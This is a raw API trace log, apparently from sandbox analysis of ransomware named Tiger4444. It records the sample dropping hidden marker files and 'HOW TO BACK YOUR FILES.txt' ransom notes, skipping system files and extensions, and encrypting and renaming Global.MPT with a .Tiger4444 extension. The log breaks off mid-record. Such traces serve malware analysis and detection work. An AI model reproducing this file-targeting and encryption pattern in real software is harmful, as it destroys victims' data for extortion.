CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.701] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a8 [0052.701] MapViewOfFile (hFileMappingObject=0x2a8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.701] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.701] CloseHandle (hObject=0x2a8) returned 1 [0052.701] CloseHandle (hObject=0x2ac) returned 1 [0052.701] GetCurrentThreadId () returned 0xfa8 [0052.701] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0052.701] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0052.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0052.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0052.701] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0052.701] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\" [0052.701] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\.BFC0E91B00AE8A0620D3" [0052.701] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.702] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.706] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.707] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.707] CloseHandle (hObject=0x2ac) returned 1 [0052.708] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned 61 [0052.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.708] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x846fab59, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f88 [0052.708] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.708] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.708] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.708] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.708] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x846fab59, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.708] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.708] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.708] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.708] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.708] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.708] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x846fab59, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x846fab59, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84705187, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.708] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.708] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.708] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee780bf0, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x12fe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 1 [0052.708] lstrcmpiW (lpString1="Global.MPT", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.708] lstrcmpiW (lpString1="Global.MPT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.708] lstrcmpiW (lpString1="Global.MPT", lpString2="Tiger4444.exe") returned -1 [0052.709] lstrcmpiW (lpString1="Global.MPT", lpString2=".") returned 1 [0052.709] lstrcmpiW (lpString1="Global.MPT", lpString2="..") returned 1 [0052.709] lstrcmpiW (lpString1="Global.MPT", lpString2="windows") returned -1 [0052.709] lstrcmpiW (lpString1="Global.MPT", lpString2="bootmgr") returned 1 [0052.709] lstrcmpiW (lpString1="Global.MPT", lpString2="pagefile.sys") returned -1 [0052.709] lstrcmpiW (lpString1="Global.MPT", lpString2="boot") returned 1 [0052.709] lstrcmpiW (lpString1="Global.MPT", lpString2="ids.txt") returned -1 [0052.709] lstrcmpiW (lpString1="Global.MPT", lpString2="NTUSER.DAT") returned -1 [0052.709] lstrcpyW (in: lpString1=0x30aeb24, lpString2="Global.MPT" | out: lpString1="Global.MPT") returned="Global.MPT" [0052.709] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT", dwFileAttributes=0x0) returned 1 [0052.709] lstrlenW (lpString="Global.MPT") returned 10 [0052.709] lstrlenW (lpString="Tiger4444") returned 9 [0052.709] lstrcmpiW (lpString1="lobal.MPT", lpString2="Tiger4444") returned -1 [0052.709] lstrlenW (lpString=".dll") returned 4 [0052.709] lstrcmpiW (lpString1=".MPT", lpString2=".dll") returned 1 [0052.709] lstrlenW (lpString=".lnk") returned 4 [0052.709] lstrcmpiW (lpString1=".MPT", lpString2=".lnk") returned 1 [0052.709] lstrlenW (lpString=".ini") returned 4 [0052.709] lstrcmpiW (lpString1=".MPT", lpString2=".ini") returned 1 [0052.710] lstrlenW (lpString=".sys") returned 4 [0052.710] lstrcmpiW (lpString1=".MPT", lpString2=".sys") returned -1 [0052.710] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0052.710] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.710] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14416295439) returned 1 [0052.710] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1244672) returned 1 [0052.710] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0052.710] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0052.710] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x130100, lpName=0x0) returned 0x2b8 [0052.711] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x130100) returned 0x30b0000 [0052.761] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0052.761] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0052.761] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0052.761] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0052.761] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.761] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0052.761] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.761] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0052.762] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14421464371) returned 1 [0052.762] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0052.762] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0052.762] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0052.772] CloseHandle (hObject=0x2b8) returned 1 [0052.772] CloseHandle (hObject=0x2a8) returned 1 [0052.772] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT.Tiger4444") returned 82 [0052.773] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt.tiger4444"), dwFlags=0x1) returned 1 [0052.774] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee780bf0, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x12fe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 0 [0052.774] FindClose (in: hFindFile=0xc72f88 | out: hFindFile=0xc72f88) returned 1 [0052.774] lstrcpyW (in: lpString1=0x30aeb24, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.774] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.775] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a8 [0052.775] MapViewOfFile (hFileMappingObject=0x2a8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.777] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.777] CloseHandle (hObject=0x2a8) returned 1 [0052.777] CloseHandle (hObject=0x2ac) returned 1 [0052.777] GetCurrentThreadId () returned 0xfa8 [0052.777] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66628 [0052.777] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC" [0052.777] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7a2e8 | out: hHeap=0xc50000) returned 1 [0052.777] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66620 | out: hHeap=0xc50000) returned 1 [0052.777] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC" [0052.777] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\" [0052.777] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\.BFC0E91B00AE8A0620D3" [0052.777] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\mmc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.779] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.781] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.782] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.782] CloseHandle (hObject=0x2ac) returned 1 [0052.782] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC") returned 45 [0052.783] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.783] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc79a26a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc79a26a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x8479ea11, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.783] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.783] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.783] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.783] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.783] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc79a26a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc79a26a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x8479ea11, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.783] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.783] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.783] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.783] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.783] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.783] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8479ea11, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8479ea11, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8479ea11, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.783] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.783] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.783] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8479ea11, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8479ea11, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8479ea11, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.783] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.783] lstrcpyW (in: lpString1=0x30aeb04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.783] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\mmc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.783] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a8 [0052.784] MapViewOfFile (hFileMappingObject=0x2a8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.784] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.784] CloseHandle (hObject=0x2a8) returned 1 [0052.784] CloseHandle (hObject=0x2ac) returned 1 [0052.784] GetCurrentThreadId () returned 0xfa8 [0052.784] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0052.784] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0052.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83510 | out: hHeap=0xc50000) returned 1 [0052.784] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0052.784] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0052.784] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0052.785] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" [0052.785] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0052.788] WriteFile (in: hFile=0x2a8, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.790] FlushFileBuffers (hFile=0x2a8) returned 1 [0052.800] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.800] CloseHandle (hObject=0x2a8) returned 1 [0052.801] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 59 [0052.801] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xabc78877, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x847c4cdd, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.801] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.801] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.801] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.801] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.801] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xabc78877, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x847c4cdd, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.801] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.801] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.801] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.801] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.801] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.801] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x847c4cdd, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x847c4cdd, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x847c4cdd, ftLastWriteTime.dwHighDateTime=0x1d50d44, 